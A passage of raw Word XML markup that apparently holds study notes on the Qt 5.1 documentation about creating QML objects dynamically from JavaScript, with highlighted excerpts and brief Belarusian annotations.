            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>javascript</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dynamicobjectcreation</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="00250096">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc483000552"/>
      <w:bookmarkStart w:id="122" w:name="_Toc483003573"/>
      <w:bookmarkStart w:id="123" w:name="_Toc483603909"/>
      <w:bookmarkStart w:id="124" w:name="_Toc483605129"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic QML Object Creation from JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00C33FBA" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML supports the dynamic creation of objects from within JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is useful to delay instantiation of objects until necessary, thereby improving application startup time. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It also allows visual objects to be dynamically created and added to the scene in reaction to user input or other events. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Два кантэкста выкарыстання магчымасці</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C33FBA" w:rsidRPr="00D815C8" w:rsidRDefault="00BE33E3"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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Scene example</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for a demonstration of the concepts discussed on this page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00BE33E3" w:rsidP="00250096">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc483000553"/>
      <w:bookmarkStart w:id="126" w:name="_Toc483003574"/>
      <w:bookmarkStart w:id="127" w:name="_Toc483603910"/>
      <w:bookmarkStart w:id="128" w:name="_Toc483605130"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating Objects Dynamically</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00BE33E3" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create objects dynamically from JavaScript. You can either call</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createComponent()</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to dynamically create a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</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object, or use</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createQmlObject()</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to create an object from a string of QML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a component is better if you have an existing component defined in a QML document and you want to dynamically create instances of that component. Otherwise, creating an object from a string of QML is useful when the object QML itself is generated at runtime.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Кантэксты выкарыстання дадзеных двух шляхоў.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75CF6" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6" w:rsidP="00250096">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc483000554"/>
      <w:bookmarkStart w:id="130" w:name="_Toc483003575"/>
      <w:bookmarkStart w:id="131" w:name="_Toc483603911"/>
      <w:bookmarkStart w:id="132" w:name="_Toc483605131"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a Component Dynamically</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6"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To dynamically load a component defined in a QML file, call the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createComponent()</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function in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt object</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This function takes the URL of the QML file as its only argument and creates a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</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object from this URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6"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Once you have a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you can call its</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>createObject()</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 xml:space="preserve">method to create an instance of the component. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">This function can take </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>one or two arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75CF6" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The first is the parent for the new object. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The parent can be a graphical object (i.e. of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
